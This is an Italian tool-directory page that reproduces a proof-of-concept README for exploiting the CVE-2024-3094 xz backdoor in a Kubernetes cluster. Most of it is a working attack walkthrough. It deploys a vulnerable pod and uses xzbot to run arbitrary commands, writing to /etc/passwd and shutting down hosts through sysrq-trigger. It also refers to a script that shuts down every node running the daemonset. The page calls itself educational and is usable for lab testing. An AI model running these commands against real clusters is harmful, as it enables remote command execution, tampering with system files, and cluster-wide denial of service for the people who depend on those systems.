Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3094 — POC di base per testare la vulnerabilità CVE-2024-3094 all'interno del cluster K8s | Kitploit
Strumenti/GitHubGitHub/shefirot/cve-2024-3094
Analisi delle VulnerabilitàExploitPenetration TestingSicurezza CloudApprendimento e FormazioneEscape dal Container
GitHubshefirot/cve-2024-3094

CVE-2024-3094

POC di base per testare la vulnerabilità CVE-2024-3094 all'interno del cluster K8s

Vedi Repository
62 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3094

POC di base per testare la vulnerabilità CVE-2024-3094 all'interno di un cluster K8s

❗ DISCLAIMER ❗

UTILIZZARE SOLO PER SCOPI EDUCATIVI. L'AUTORE NON È RESPONSABILE DI QUALSIASI DANNO CAUSATO DALL'USO DI QUESTO SOFTWARE

Descrizione

Distribuiremo un pod vulnerabile e lo sfrutteremo per eseguire comandi all'interno di quel pod vulnerabile. Lo facciamo all'interno della stessa rete per motivi di sicurezza. Non esponiamo il pod vulnerabile a Internet, ma il concetto è lo stesso.

La vulnerabilità consente di eseguire comandi all'interno del pod, anche se il pod è in esecuzione con un security context; puoi, ad esempio, spegnere l'host che esegue il pod.

Se la vulnerabilità è presente in un singolo pod, puoi spegnere l'host, rendendo temporaneamente non disponibili tutti i servizi in esecuzione su quell'host. Ma se la vulnerabilità è in esecuzione come daemonset, puoi spegnere tutti gli host che eseguono quel daemonset, e persino l'intero cluster.

Requisiti

  • Cluster K8s distribuito
  • Kubectl installato
  • Accesso al cluster K8s
  • Go installato

Utilizzo

Per prima cosa, installa xzbots nel cluster

root@kitploit:~
go install github.com/amlweems/xzbot@latest

Scarica la repo e distribuisci il deployment/daemonset vulnerabile

root@kitploit:~
git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# Or daemonset
kubectl apply -f daemonset_cve-2024-3094.yml
root@kitploit:~
# Get the pod name
kubectl -n vulnes get pods

# Port forward the pod
kubectl -n vulnes port-forward <pod-name> 2225:22

# Execute command, for example write in /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'

# Check the /etc/passwd file
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd

Vai avanti e spegni l'host

root@kitploit:~
# Enable sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'

# Shutdown the host
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'

Puoi anche spegnere tutti gli host che eseguono il daemonset

root@kitploit:~
source shutdown_nodes.sh

Problemi noti

1. Connessione rifiutata

Quando esegui il loop per spegnere tutti gli host, se ricevi questo errore:

root@kitploit:~
2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refused

Concedi più tempo al port forward per essere pronto; puoi aumentare il tempo di sleep nel loop.

Informazioni aggiuntive

L'immagine del container utilizzata è stata generata con il dockerfile nella repo; puoi generare l'immagine e pubblicarla nel tuo registry.

Per generare la libreria liblzma.so.5.6.0.patch, puoi utilizzare il repo amlweems indicato nei riferimenti.

Riferimenti

repo di amlweems

repo di r0binak

Scarica lo strumento